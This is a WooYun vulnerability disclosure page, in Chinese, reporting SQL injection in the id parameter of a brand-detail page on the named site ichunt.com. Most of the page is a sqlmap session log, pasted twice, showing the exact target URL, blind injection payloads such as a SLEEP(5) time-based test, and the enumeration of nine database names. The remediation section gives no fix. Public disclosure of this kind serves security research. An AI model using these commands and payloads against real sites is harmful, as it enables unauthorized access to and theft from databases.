当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141141

漏洞标题:猎芯网主站SQL注入

相关厂商:猎芯网

漏洞作者: 残废

提交时间:2015-09-14 19:03

修复时间:2015-10-29 19:04

公开时间:2015-10-29 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
随着7月8日猎芯网上线,这个面向中小企业的电子元器件B2B电商立刻引起了行业的热议,猎芯的定位及创新的运营模式似乎代表着电商平台行业的另一股新生力量,成为乱象丛生的电商市场中一匹黑马!
猎芯网上线两周交易额就突破1000万的喜人成绩,让人不禁一探猎芯网的究竟。《国际电子商情》采访到猎芯网市场营销总监陈程,揭开猎芯的魅力与其背后拥有的实力。

详细说明:

http://www.ichunt.com/brand_detail.php?id=101


CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101"
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 18:42:33
[18:42:33] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:42:33] [INFO] resuming injection data from session file
[18:42:33] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:42:33] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=101 AND 2490=2490
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=101 AND SLEEP(5)
---
[18:42:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:42:35] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'
[*] shutting down at: 18:42:35
CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101" --dbs
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 18:43:21
[18:43:22] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:43:22] [INFO] resuming injection data from session file
[18:43:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:43:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=101 AND 2490=2490
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=101 AND SLEEP(5)
---
[18:43:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:43:22] [INFO] fetching database names
[18:43:22] [INFO] fetching number of databases
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': 9
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': information_schema
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': ichunt
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmall
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmao
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': lx
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': mysql
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': qbt_icmaobbs
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': test
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': xqbt_bbs
available databases [9]:
[*] ichunt
[*] icmall
[*] icmao
[*] information_schema
[*] lx
[*] mysql
[*] qbt_icmaobbs
[*] test
[*] xqbt_bbs
[18:43:22] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'

漏洞证明:

CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101"
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 18:42:33
[18:42:33] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:42:33] [INFO] resuming injection data from session file
[18:42:33] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:42:33] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=101 AND 2490=2490
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=101 AND SLEEP(5)
---
[18:42:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:42:35] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'
[*] shutting down at: 18:42:35
CanF:sqlmap CanF$ python sqlmap.py -u "http://www.ichunt.com/brand_detail.php?id=101" --dbs
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 18:43:21
[18:43:22] [INFO] using '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session' as session file
[18:43:22] [INFO] resuming injection data from session file
[18:43:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:43:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=101 AND 2490=2490
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=101 AND SLEEP(5)
---
[18:43:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:43:22] [INFO] fetching database names
[18:43:22] [INFO] fetching number of databases
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': 9
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': information_schema
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': ichunt
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmall
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': icmao
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': lx
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': mysql
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': qbt_icmaobbs
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': test
[18:43:22] [INFO] read from file '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com/session': xqbt_bbs
available databases [9]:
[*] ichunt
[*] icmall
[*] icmao
[*] information_schema
[*] lx
[*] mysql
[*] qbt_icmaobbs
[*] test
[*] xqbt_bbs
[18:43:22] [INFO] Fetched data logged to text files under '/Users/mimi/Desktop/pentest/SqlMap/output/www.ichunt.com'

修复方案:

你懂得

版权声明:转载请注明来源 残废@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝